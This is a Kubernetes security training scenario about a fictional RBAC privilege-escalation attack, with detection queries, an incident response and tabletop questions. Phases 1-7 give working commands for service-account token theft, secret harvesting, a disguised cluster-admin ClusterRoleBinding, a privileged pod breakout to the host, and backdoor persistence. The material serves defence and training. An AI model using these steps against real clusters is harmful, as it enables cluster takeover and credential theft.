SC-085: Kubernetes RBAC Privilege Escalation — Operation CLUSTER CROWN

Scenario Overview

Field Detail
ID SC-085
Category Cloud Security / Kubernetes / Privilege Escalation
Severity Critical
ATT&CK Tactics Initial Access, Persistence, Privilege Escalation, Discovery, Lateral Movement
ATT&CK Techniques T1078.004 (Valid Accounts: Cloud Accounts), T1613 (Container and Resource Discovery), T1611 (Escape to Host), T1098 (Account Manipulation), T1053.007 (Scheduled Task/Job: Container Orchestration Job), T1136.001 (Create Account: Local Account)
Target Environment Multi-tenant Kubernetes cluster (v1.29) running production workloads with RBAC, network policies, and admission controllers on a major cloud provider
Difficulty ★★★★★
Duration 3–4 hours
Estimated Impact Full cluster admin compromise from an initial namespace-scoped service account; lateral movement across 6 namespaces; exfiltration of 14 Secret objects including database credentials and TLS certificates; persistent backdoor ClusterRoleBinding surviving pod restarts; 18-hour containment and remediation

Narrative

Orion Cloud Systems, a fictional fintech SaaS provider, operates a 120-node Kubernetes cluster on a managed cloud platform. The cluster hosts its core payment processing platform, customer API gateway, internal tooling, and CI/CD pipeline runners. The cluster uses the 10.100.0.0/16 network, with the API server at api.k8s.orion.example.com (198.51.100.30).

The cluster uses RBAC for access control, with namespace-scoped Roles for application service accounts and ClusterRoles for platform engineering. Pod Security Standards are set to "baseline" (not "restricted"), and the cluster runs an admission controller for basic image verification. Approximately 340 pods run across 12 namespaces, processing 8 million API requests per day.

In April 2026, a threat actor group designated KUBE PHANTOM — a cloud-focused APT specializing in Kubernetes and container orchestration exploitation — targets Orion's cluster through a compromised CI/CD pipeline runner pod. The attack begins with service account token theft from a misconfigured pod, escalates through RBAC enumeration and ClusterRoleBinding abuse, and culminates in full cluster admin access with persistent backdoors.

Attack Flow

graph TD
    A[Phase 1: Initial Foothold<br/>Compromised CI/CD runner pod via supply chain] --> B[Phase 2: Service Account Token Theft<br/>Extract mounted SA token from pod filesystem]
    B --> C[Phase 3: RBAC Enumeration<br/>Map permissions, roles, and bindings across cluster]
    C --> D[Phase 4: Secrets Harvesting<br/>Read accessible Secrets in permitted namespaces]
    D --> E[Phase 5: ClusterRoleBinding Abuse<br/>Escalate to cluster-admin via overprivileged binding]
    E --> F[Phase 6: Pod Escape to Host<br/>Privileged container breakout to node OS]
    F --> G[Phase 7: Persistence & Lateral Movement<br/>Backdoor ClusterRoleBinding + cross-namespace pivot]
    G --> H[Phase 8: Detection & Response<br/>Audit log anomalies + RBAC change alerts]

Phase Details

Phase 1: Initial Foothold — Compromised CI/CD Runner

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

KUBE PHANTOM identifies that Orion's CI/CD system (a self-hosted GitLab Runner) executes pipeline jobs as Kubernetes pods in the cicd-runners namespace. A supply chain compromise in a widely used build dependency (a malicious post-install script in a package version) gives the attacker code execution inside a runner pod during a routine build job.
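
The post-install vector above can be screened before a dependency ever reaches a runner. A minimal sketch that flags npm-style lifecycle hooks in a package manifest (the helper name and sample manifest are illustrative; real software-composition tooling covers far more):

```python
# Flag npm lifecycle hooks that execute code at install time -- the same
# vector used for the initial foothold. Illustrative screen only, not a
# full software-composition-analysis tool.
import json

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def install_scripts(package_json: str) -> dict:
    """Return only the scripts that run automatically during install."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}

# Hypothetical manifest resembling a compromised build dependency
manifest = json.dumps({
    "name": "build-helper",
    "version": "3.2.1",
    "scripts": {"test": "jest", "postinstall": "node ./setup.js"},
})
print(install_scripts(manifest))  # {'postinstall': 'node ./setup.js'}
```

In a pipeline, a non-empty result would gate the job for human review rather than block outright, since many legitimate packages also use postinstall.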

# Simulated initial foothold (educational only)
# Attacker gains shell in CI/CD runner pod

# Pod identity and environment reconnaissance
$ hostname
runner-pipeline-7a3f-build-28491

$ cat /etc/os-release | head -2
NAME="Ubuntu"
VERSION="22.04.4 LTS (Jammy Jellyfish)"

$ env | grep -i kube
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.100.0.1:443

# Check what namespace we're in
$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cicd-runners

# Network reconnaissance from inside the pod
$ ip addr show eth0
    inet 10.100.42.18/24 brd 10.100.42.255 scope global eth0

# DNS discovery of cluster services
$ nslookup kubernetes.default.svc.cluster.local
Server:    10.100.0.10
Address:   10.100.0.10#53
Name:      kubernetes.default.svc.cluster.local
Address:   10.100.0.1

Phase 2: Service Account Token Theft

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

The runner pod has a Kubernetes service account token automatically mounted at the standard path. While this is default behavior, the cicd-runner-sa service account has been granted overly broad permissions to support pipeline operations — it can create and manage pods, read ConfigMaps and Secrets in its namespace, and list resources across namespaces.

# Simulated token theft (educational only)
# Extract the mounted service account token

$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
lrwxrwxrwx 1 root root   13 Apr  1 08:00 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Apr  1 08:00 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Apr  1 08:00 token -> ..data/token

# Read the service account JWT token
$ SA_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ echo $SA_TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
{
    "iss": "https://api.k8s.orion.example.com",
    "sub": "system:serviceaccount:cicd-runners:cicd-runner-sa",
    "aud": ["https://api.k8s.orion.example.com"],
    "exp": 1743580800,
    "iat": 1711958400,
    "nbf": 1711958400
}

# Verify the token works against the API server
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/pods \
    | python3 -c "import sys,json; data=json.load(sys.stdin); print(f'Pods found: {len(data[\"items\"])}')"
Pods found: 14

# The token is valid and can enumerate pods in the cicd-runners namespace
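
The `cut`/`base64 -d` one-liner above relies on error suppression because JWT segments use unpadded base64url. A more robust payload decoder for defender-side token triage (a sketch; the helper name and the locally built sample token are hypothetical):

```python
# Decode a JWT payload without verifying the signature (triage only).
# JWT segments are unpadded base64url, so padding must be restored first.
import base64
import json

def jwt_payload(token: str) -> dict:
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Locally built token-shaped string; not a real credential
claims = {"sub": "system:serviceaccount:cicd-runners:cicd-runner-sa"}
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
print(jwt_payload(f"header.{body}.signature")["sub"])
# system:serviceaccount:cicd-runners:cicd-runner-sa
```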

Phase 3: RBAC Enumeration

ATT&CK Technique: T1613 (Container and Resource Discovery)

Using the stolen service account token, KUBE PHANTOM systematically enumerates the cluster's RBAC configuration to identify privilege escalation paths. The cicd-runner-sa can list ClusterRoles, and can both list and create ClusterRoleBindings — a common misconfiguration in CI/CD service accounts that need to deploy resources across namespaces.

# Simulated RBAC enumeration (educational only)
# Check what the current service account can do

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
    -X POST -H "Content-Type: application/json" \
    -d '{"apiVersion":"authorization.k8s.io/v1",
         "kind":"SelfSubjectRulesReview",
         "spec":{"namespace":"cicd-runners"}}'

# Key permissions discovered:
# - pods: [get, list, create, delete] in cicd-runners
# - secrets: [get, list] in cicd-runners
# - configmaps: [get, list] in cicd-runners
# - clusterroles: [list] cluster-wide
# - clusterrolebindings: [list, create] cluster-wide  ← CRITICAL FINDING
# - namespaces: [list] cluster-wide

# Enumerate all ClusterRoleBindings
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for item in data['items']:
    role = item['roleRef']['name']
    subjects = [s.get('name','?') for s in item.get('subjects',[])]
    print(f'{item[\"metadata\"][\"name\"]:45} -> {role:30} subjects={subjects}')
"

# Output (abbreviated):
# system:controller:deployment-ctrl             -> system:controller:deployment   subjects=['deployment-controller']
# cicd-deployer-binding                         -> cicd-deployer-role             subjects=['cicd-runner-sa']
# platform-admin-binding                        -> cluster-admin                  subjects=['platform-admin-sa']
# legacy-monitoring-binding                     -> cluster-admin                  subjects=['monitoring-sa']  ← TARGET

# CRITICAL: legacy-monitoring-binding grants cluster-admin to monitoring-sa
# If we can impersonate or obtain monitoring-sa, we get full cluster control

# Enumerate namespaces to map the attack surface
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for ns in data['items']:
    print(ns['metadata']['name'])
"
# default
# kube-system
# kube-public
# cicd-runners
# payments-prod
# payments-staging
# customer-api
# internal-tools
# monitoring
# logging
# cert-manager
# ingress-nginx
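
Offline, the binding dump above reduces to a simple scan. A sketch (the function and sample data are reconstructions of the scenario output, not a real audit tool) that flags every ClusterRoleBinding resolving to cluster-admin:

```python
# Flag ClusterRoleBindings that grant cluster-admin, operating on the JSON
# shape returned by /apis/rbac.authorization.k8s.io/v1/clusterrolebindings.
def cluster_admin_bindings(crb_list: dict) -> list:
    findings = []
    for item in crb_list.get("items", []):
        if item["roleRef"]["name"] != "cluster-admin":
            continue
        for subj in item.get("subjects", []):
            findings.append((item["metadata"]["name"],
                             subj.get("kind"), subj.get("name")))
    return findings

# Abbreviated reconstruction of the scenario's binding list
sample = {"items": [
    {"metadata": {"name": "cicd-deployer-binding"},
     "roleRef": {"name": "cicd-deployer-role"},
     "subjects": [{"kind": "ServiceAccount", "name": "cicd-runner-sa"}]},
    {"metadata": {"name": "legacy-monitoring-binding"},
     "roleRef": {"name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "monitoring-sa"}]},
]}
for name, kind, subject in cluster_admin_bindings(sample):
    print(f"{name}: cluster-admin -> {kind}/{subject}")
# legacy-monitoring-binding: cluster-admin -> ServiceAccount/monitoring-sa
```

Run against the full dump, this immediately surfaces legacy-monitoring-binding, the escalation path the attacker exploits in Phase 5.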

Phase 4: Secrets Harvesting

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

Before escalating privileges, KUBE PHANTOM harvests all accessible Secrets in the cicd-runners namespace. These include image pull secrets, pipeline credentials, and — critically — a service account token for the monitoring namespace stored as a CI/CD deployment secret.

# Simulated secrets harvesting (educational only)
# List all secrets in cicd-runners namespace

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for s in data['items']:
    print(f'{s[\"metadata\"][\"name\"]:45} type={s[\"type\"]}')
"

# Output:
# default-token-x7k2p                           type=kubernetes.io/service-account-token
# cicd-runner-sa-token-m3j8                      type=kubernetes.io/service-account-token
# registry-pull-secret                           type=kubernetes.io/dockerconfigjson
# gitlab-deploy-token                            type=Opaque
# monitoring-deploy-sa-token                     type=Opaque  ← HIGH VALUE TARGET
# payments-db-deploy-creds                       type=Opaque
# tls-wildcard-orion-example                     type=kubernetes.io/tls

# Extract the monitoring deployment service account token
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/secrets/monitoring-deploy-sa-token \
    | python3 -c "
import sys, json, base64
data = json.load(sys.stdin)
token = base64.b64decode(data['data']['token']).decode()
# Decode the JWT payload (base64url, padding restored)
payload_b64 = token.split('.')[1]
payload = json.loads(base64.urlsafe_b64decode(payload_b64 + '=' * (-len(payload_b64) % 4)))
print(f'Subject: {payload[\"sub\"]}')
print(f'Namespace: {payload[\"sub\"].split(\":\")[2]}')
"

# Subject: system:serviceaccount:monitoring:monitoring-sa
# This is the service account bound to cluster-admin via legacy-monitoring-binding!

# Total secrets harvested: 7 objects
# Critical findings:
# - monitoring-sa token → cluster-admin access
# - payments-db-deploy-creds → database credentials (testuser/REDACTED)
# - tls-wildcard-orion-example → wildcard TLS cert for *.orion.example.com

Phase 5: ClusterRoleBinding Abuse — Escalation to Cluster Admin

ATT&CK Technique: T1098 (Account Manipulation)

KUBE PHANTOM now has two paths to cluster-admin: (1) use the stolen monitoring-sa token directly, or (2) create a new ClusterRoleBinding granting cluster-admin to the cicd-runner-sa. The attacker uses both — the monitoring-sa token for immediate access, and a new ClusterRoleBinding for persistence.

# Simulated privilege escalation (educational only)
# Path 1: Use stolen monitoring-sa token for immediate cluster-admin access

$ MONITORING_TOKEN="<extracted-from-secret>"

# Verify cluster-admin access
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
print(f'kube-system secrets accessible: {len(data[\"items\"])}')
"
# kube-system secrets accessible: 23
# CONFIRMED: Full cluster-admin access achieved

# Path 2: Create persistent ClusterRoleBinding for cicd-runner-sa
# The cicd-runner-sa has 'create' permission on ClusterRoleBindings

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "rbac.authorization.k8s.io/v1",
      "kind": "ClusterRoleBinding",
      "metadata": {
        "name": "system-node-proxy-binding",
        "labels": {
          "kubernetes.io/bootstrapping": "rbac-defaults"
        }
      },
      "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "ClusterRole",
        "name": "cluster-admin"
      },
      "subjects": [
        {
          "kind": "ServiceAccount",
          "name": "cicd-runner-sa",
          "namespace": "cicd-runners"
        }
      ]
    }'

# Response: 201 Created
# The new ClusterRoleBinding is named to blend with system bindings
# and labeled to appear as an RBAC bootstrap default

Phase 6: Pod Escape to Host

ATT&CK Technique: T1611 (Escape to Host)

With cluster-admin privileges, KUBE PHANTOM creates a privileged pod that mounts the host filesystem, enabling breakout from the container to the underlying node OS. This provides access to kubelet credentials, other pod data on the node, and the ability to tamper with node-level components.

# Simulated pod escape (educational only)
# Create a privileged pod mounting the host filesystem

$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/pods \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {
        "name": "node-debug-utility",
        "namespace": "kube-system",
        "labels": {
          "app": "node-debug",
          "tier": "infrastructure"
        }
      },
      "spec": {
        "hostPID": true,
        "hostNetwork": true,
        "containers": [{
          "name": "debug",
          "image": "registry.orion.example.com/base/ubuntu:22.04",
          "command": ["/bin/sleep", "86400"],
          "securityContext": {
            "privileged": true
          },
          "volumeMounts": [{
            "name": "host-root",
            "mountPath": "/host"
          }]
        }],
        "volumes": [{
          "name": "host-root",
          "hostPath": {
            "path": "/",
            "type": "Directory"
          }
        }],
        "nodeSelector": {
          "node-role.kubernetes.io/control-plane": ""
        },
        "tolerations": [{
          "operator": "Exists"
        }]
      }
    }'

# Response: 201 Created — pod scheduled on control-plane node

# Execute commands on the host via the privileged pod
# (the exec subresource requires a SPDY/WebSocket upgrade, so plain curl
#  cannot stream it; the equivalent kubectl invocation with the stolen token:)
$ kubectl --server=https://10.100.0.1:443 --token="$MONITORING_TOKEN" \
    --insecure-skip-tls-verify -n kube-system exec node-debug-utility -- \
    chroot /host /bin/bash -c 'id && hostname'

# uid=0(root) gid=0(root) groups=0(root)
# k8s-control-01.orion.example.com

# Access kubelet credentials on the node
# $ chroot /host cat /etc/kubernetes/kubelet.conf
# (contains kubelet client certificate — full node-level access)

# Enumerate all pods on this node
# $ chroot /host crictl ps --output json | jq '.containers[].metadata.name'
# "kube-apiserver"
# "kube-controller-manager"
# "etcd"
# "kube-scheduler"
# "coredns"
# "node-debug-utility"

Phase 7: Persistence & Lateral Movement

ATT&CK Technique: T1098 (Account Manipulation), T1613 (Container and Resource Discovery)

KUBE PHANTOM establishes multiple persistence mechanisms and pivots across namespaces to access high-value workloads. The attacker creates additional backdoor service accounts, deploys a CronJob for persistent access, and harvests secrets from the payments-prod namespace.

# Simulated persistence and lateral movement (educational only)

# Persistence 1: Create a backdoor service account in kube-system
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/serviceaccounts \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "v1",
      "kind": "ServiceAccount",
      "metadata": {
        "name": "system-proxy-controller",
        "namespace": "kube-system",
        "labels": {
          "kubernetes.io/cluster-service": "true"
        }
      }
    }'

# Bind it to cluster-admin
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "rbac.authorization.k8s.io/v1",
      "kind": "ClusterRoleBinding",
      "metadata": {
        "name": "system-proxy-controller-binding"
      },
      "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "ClusterRole",
        "name": "cluster-admin"
      },
      "subjects": [{
        "kind": "ServiceAccount",
        "name": "system-proxy-controller",
        "namespace": "kube-system"
      }]
    }'

# Persistence 2: CronJob that re-exercises the backdoor SA every 30 minutes
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/apis/batch/v1/namespaces/kube-system/cronjobs \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "batch/v1",
      "kind": "CronJob",
      "metadata": {
        "name": "node-health-checker",
        "namespace": "kube-system"
      },
      "spec": {
        "schedule": "*/30 * * * *",
        "jobTemplate": {
          "spec": {
            "template": {
              "spec": {
                "serviceAccountName": "system-proxy-controller",
                "containers": [{
                  "name": "health-check",
                  "image": "registry.orion.example.com/base/alpine:3.19",
                  "command": ["/bin/sh", "-c",
                    "TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token); curl -sk -H \"Authorization: Bearer $TOKEN\" https://10.100.0.1:443/api/v1/namespaces/kube-system/secrets/system-proxy-controller-token -o /dev/null"]
                }],
                "restartPolicy": "OnFailure"
              }
            }
          }
        }
      }
    }'

# Lateral movement: Access payments-prod namespace secrets
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/payments-prod/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for s in data['items']:
    print(f'{s[\"metadata\"][\"name\"]:45} type={s[\"type\"]}')
"
# payments-db-credentials                        type=Opaque
# stripe-api-key                                 type=Opaque
# payment-processor-tls                          type=kubernetes.io/tls
# encryption-key-master                          type=Opaque
# jwt-signing-key                                type=Opaque

# Total namespaces accessed: 6 (cicd-runners, monitoring, kube-system,
#   payments-prod, customer-api, internal-tools)
# Total secrets harvested: 14 across all namespaces
# Persistence mechanisms: 2 (backdoor SA + CronJob)
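
The cross-namespace totals above are exactly what baseline-deviation analytics key on in Phase 8. A toy scorer over audit events (field names only loosely follow the Kubernetes audit schema, and the threshold is illustrative):

```python
# Toy cross-namespace access scorer over Kubernetes audit events.
# Field names loosely follow the audit schema; threshold is illustrative.
from collections import defaultdict

def scope_violations(events: list, max_foreign_namespaces: int = 2) -> dict:
    """Map each service account to the foreign namespaces it touched,
    keeping only accounts that exceed the threshold."""
    accessed = defaultdict(set)
    for event in events:
        user = event["user"]
        if not user.startswith("system:serviceaccount:"):
            continue
        home_namespace = user.split(":")[2]
        if event["namespace"] != home_namespace:
            accessed[user].add(event["namespace"])
    return {u: ns for u, ns in accessed.items()
            if len(ns) > max_foreign_namespaces}

events = [
    {"user": "system:serviceaccount:cicd-runners:cicd-runner-sa", "namespace": ns}
    for ns in ("kube-system", "payments-prod", "customer-api")
]
for user, namespaces in scope_violations(events).items():
    print(user, sorted(namespaces))
```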

Phase 8: Detection & Response

The attack is detected through multiple monitoring channels:

Channel 1 (T+1.5 hours): Kubernetes Audit Log Alert — The cluster's audit logging detects creation of a new ClusterRoleBinding granting cluster-admin. This matches a high-fidelity detection rule for RBAC changes outside of approved GitOps workflows.

Channel 2 (T+2 hours): Privileged Pod Alert — The admission controller (running in audit mode, not enforce) logs the creation of a privileged pod in kube-system with hostPID, hostNetwork, and host filesystem mounts. The runtime security agent flags the chroot syscall.

Channel 3 (T+3 hours): Anomalous API Access Patterns — The cloud-native SIEM detects that the cicd-runner-sa service account is making API calls to namespaces and resource types far outside its historical baseline (kube-system secrets, payments-prod secrets).

# Simulated detection timeline (educational only)
[2026-04-01 10:32:18 UTC] K8S AUDIT — RBAC CHANGE ALERT
  Source: api.k8s.orion.example.com
  Alert: CLUSTERROLEBINDING_CREATED
  Details:
    - Name: system-node-proxy-binding
    - RoleRef: cluster-admin
    - Subject: cicd-runner-sa (cicd-runners namespace)
    - Created by: system:serviceaccount:cicd-runners:cicd-runner-sa
    - NOT via GitOps pipeline (argocd-application-controller)
  Severity: CRITICAL
  Action: SOC escalation

[2026-04-01 11:05:44 UTC] RUNTIME SECURITY — PRIVILEGED POD ALERT
  Source: runtime-agent on k8s-control-01.orion.example.com
  Alert: PRIVILEGED_CONTAINER_CREATED
  Details:
    - Pod: kube-system/node-debug-utility
    - Privileged: true, HostPID: true, HostNetwork: true
    - Volume: hostPath / mounted at /host
    - Syscall: chroot detected
    - Image: registry.orion.example.com/base/ubuntu:22.04
  Severity: CRITICAL
  Action: Pod quarantine + node isolation

[2026-04-01 12:18:33 UTC] SIEM — ANOMALOUS API ACCESS
  Source: k8s-audit-log-forwarder
  Alert: SERVICE_ACCOUNT_SCOPE_VIOLATION
  Details:
    - Service account: cicd-runner-sa (cicd-runners)
    - Accessed namespaces: kube-system, payments-prod, customer-api
    - Historical baseline: cicd-runners only
    - Resource types accessed: secrets, serviceaccounts, clusterrolebindings
    - API call volume: 147 calls in 2 hours (baseline: 12/hour)
  Risk Score: 98/100
  Action: Token revocation + full cluster audit

Detection Queries:

// KQL — Detect ClusterRoleBinding creation granting cluster-admin
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "clusterrolebindings"
| extend RoleRef = parse_json(RequestObject).roleRef.name
| where RoleRef == "cluster-admin"
| extend CreatedBy = User_Username
| where CreatedBy !in ("system:serviceaccount:argocd:argocd-application-controller",
                        "system:serviceaccount:flux-system:flux-controller")
| project TimeGenerated, CreatedBy, ObjectRef_Name, RoleRef,
          SourceIPs, UserAgent

// KQL — Detect privileged pod creation with host access
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "pods"
| extend PodSpec = parse_json(RequestObject).spec
| where PodSpec.hostPID == true
    or PodSpec.hostNetwork == true
    or tostring(PodSpec.containers) has "privileged\":true"
    or tostring(PodSpec.volumes) has "hostPath"
| project TimeGenerated, User_Username, ObjectRef_Namespace,
          ObjectRef_Name, SourceIPs

// KQL — Detect service account accessing secrets across namespaces
KubernetesAuditLog
| where TimeGenerated > ago(6h)
| where ObjectRef_Resource == "secrets"
| where Verb in ("get", "list")
| where User_Username startswith "system:serviceaccount:"
| extend SA_Namespace = extract("system:serviceaccount:([^:]+):", 1, User_Username)
| where SA_Namespace != ObjectRef_Namespace
| summarize NamespacesAccessed = make_set(ObjectRef_Namespace),
            SecretsAccessed = dcount(ObjectRef_Name),
            CallCount = count()
  by User_Username, bin(TimeGenerated, 1h)
| where SecretsAccessed > 3 or array_length(NamespacesAccessed) > 2
| project TimeGenerated, User_Username, NamespacesAccessed,
          SecretsAccessed, CallCount

// KQL — Detect anomalous CronJob creation in kube-system
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "cronjobs"
| where ObjectRef_Namespace == "kube-system"
| project TimeGenerated, User_Username, ObjectRef_Name,
          SourceIPs, UserAgent

# SPL — Detect ClusterRoleBinding creation granting cluster-admin
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="clusterrolebindings"
| spath output=role_ref path=requestObject.roleRef.name
| where role_ref="cluster-admin"
| spath output=created_by path=user.username
| where NOT match(created_by, "(argocd-application-controller|flux-controller)")
| table _time, created_by, objectRef.name, role_ref, sourceIPs{},
        userAgent

# SPL — Detect privileged pod creation with host access
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="pods"
| spath output=host_pid path=requestObject.spec.hostPID
| spath output=host_net path=requestObject.spec.hostNetwork
| spath output=containers path=requestObject.spec.containers{}
| where host_pid="true" OR host_net="true"
    OR match(containers, "privileged.{0,5}true")
    OR match(containers, "hostPath")
| table _time, user.username, objectRef.namespace, objectRef.name,
        host_pid, host_net, sourceIPs{}

# SPL — Detect service account accessing secrets across namespaces
index=kubernetes sourcetype=kube:apiserver:audit
  objectRef.resource="secrets" verb IN ("get", "list")
  user.username="system:serviceaccount:*"
| rex field=user.username "system:serviceaccount:(?<sa_namespace>[^:]+):"
| where sa_namespace != 'objectRef.namespace'
| bin _time span=1h
| stats dc(objectRef.name) as secrets_accessed,
        values(objectRef.namespace) as namespaces_accessed,
        count as call_count
  by user.username, _time
| where secrets_accessed > 3 OR mvcount(namespaces_accessed) > 2
| table _time, user.username, namespaces_accessed, secrets_accessed,
        call_count

# SPL — Detect anomalous CronJob creation in kube-system
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="cronjobs"
  objectRef.namespace="kube-system"
| table _time, user.username, objectRef.name, sourceIPs{}, userAgent

Incident Response:

# Simulated incident response (educational only)
[2026-04-01 12:30:00 UTC] ALERT: Kubernetes Security Incident Response activated

[2026-04-01 12:35:00 UTC] ACTION: Immediate containment
  - cicd-runner-sa token REVOKED
  - monitoring-sa token REVOKED
  - system-proxy-controller SA DELETED
  - Malicious ClusterRoleBindings DELETED:
    system-node-proxy-binding
    system-proxy-controller-binding

[2026-04-01 12:45:00 UTC] ACTION: Pod quarantine
  - node-debug-utility pod TERMINATED
  - node-health-checker CronJob DELETED
  - All cicd-runner pods TERMINATED and rebuilt
  - k8s-control-01 node CORDONED for forensic analysis

[2026-04-01 13:00:00 UTC] ACTION: Secret rotation
  - All secrets in affected namespaces ROTATED
  - payments-db-credentials: password rotated
  - stripe-api-key: key rotated via provider
  - TLS certificates: reissued
  - JWT signing keys: rotated with grace period

[2026-04-01 14:00:00 UTC] ACTION: RBAC hardening
  - Pod Security Standards: elevated to "restricted"
  - Admission controller: enforce mode enabled
  - ClusterRoleBinding create: restricted to GitOps SA only
  - automountServiceAccountToken: false on all non-essential pods
  - Network policies: namespace isolation enforced

[2026-04-01 18:00:00 UTC] ACTION: Impact assessment
  Namespaces compromised: 6
  Secrets exfiltrated: 14 objects
  Persistence mechanisms: 2 (both removed)
  Node-level access: 1 control-plane node
  Data exposure: database credentials, API keys, TLS certs (all rotated)
  Lateral movement: confirmed across 6 namespaces

Decision Points (Tabletop Exercise)

Decision Point 1 — Pre-Incident

Your CI/CD runner pods need to deploy resources across namespaces. How do you scope their RBAC permissions to allow legitimate operations while preventing the privilege escalation chain described in this scenario? What is the minimum permission set?
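
One possible starting point for discussion, not a vetted minimum: grant a namespace-scoped deploy Role in each target namespace and lint it for escalation-enabling grants. A sketch (the role contents and the risky-resource list are illustrative):

```python
# Sketch of a namespace-scoped CI/CD deploy Role plus a lint that rejects
# escalation-enabling grants. Contents are illustrative, not a vetted minimum.
DEPLOY_ROLE = {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "Role",  # namespace-scoped; stamped into each target namespace
    "metadata": {"name": "cicd-deployer", "namespace": "payments-staging"},
    "rules": [
        {"apiGroups": ["apps"], "resources": ["deployments"],
         "verbs": ["get", "list", "create", "update", "patch"]},
        {"apiGroups": [""], "resources": ["configmaps", "services"],
         "verbs": ["get", "list", "create", "update", "patch"]},
    ],
}

# Grants that enable the escalation chain in this scenario
RISKY_RESOURCES = {"clusterroles", "clusterrolebindings", "roles",
                   "rolebindings", "secrets", "serviceaccounts"}

def risky_rules(role: dict) -> list:
    return [rule for rule in role["rules"]
            if RISKY_RESOURCES & set(rule["resources"]) or "*" in rule["verbs"]]

print(risky_rules(DEPLOY_ROLE))  # [] -> no escalation-enabling grants
```

Note the sketch deliberately grants nothing cluster-scoped: no ClusterRole, no ClusterRoleBinding verbs, and no secret reads, which breaks Phases 3 through 5 of this scenario at the first step.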

Decision Point 2 — During Detection

You detect a new ClusterRoleBinding granting cluster-admin, but it was created by a legitimate service account (cicd-runner-sa). The CI/CD team says they did not create it, but they also cannot confirm the SA was not compromised. How do you triage this without disrupting active deployments?

Decision Point 3 — Scope Assessment

After confirming cluster-admin compromise, you need to determine the blast radius. The attacker had access for approximately 2 hours before detection. How do you identify all resources accessed, modified, or created during this window? What audit log fields are most critical?

Decision Point 4 — Post-Incident

Your investigation reveals that the root cause was a CI/CD service account with create permission on ClusterRoleBindings. How do you redesign the CI/CD RBAC model to support multi-namespace deployments without granting escalation-enabling permissions? Consider GitOps-based alternatives.

Lessons Learned

Key Takeaways

  1. Service account tokens mounted in pods are pre-staged credentials for attackers — Any pod compromise immediately yields a Kubernetes API credential. Disable automatic token mounting (automountServiceAccountToken: false) on all pods that do not need API access. Use projected service account tokens with audience and expiry constraints.

  2. ClusterRoleBinding create permission is a cluster-admin equivalent — Any principal that can create ClusterRoleBindings can grant itself or others cluster-admin. This permission must be restricted to a minimal set of principals (ideally only GitOps controllers) and monitored with high-fidelity alerts.

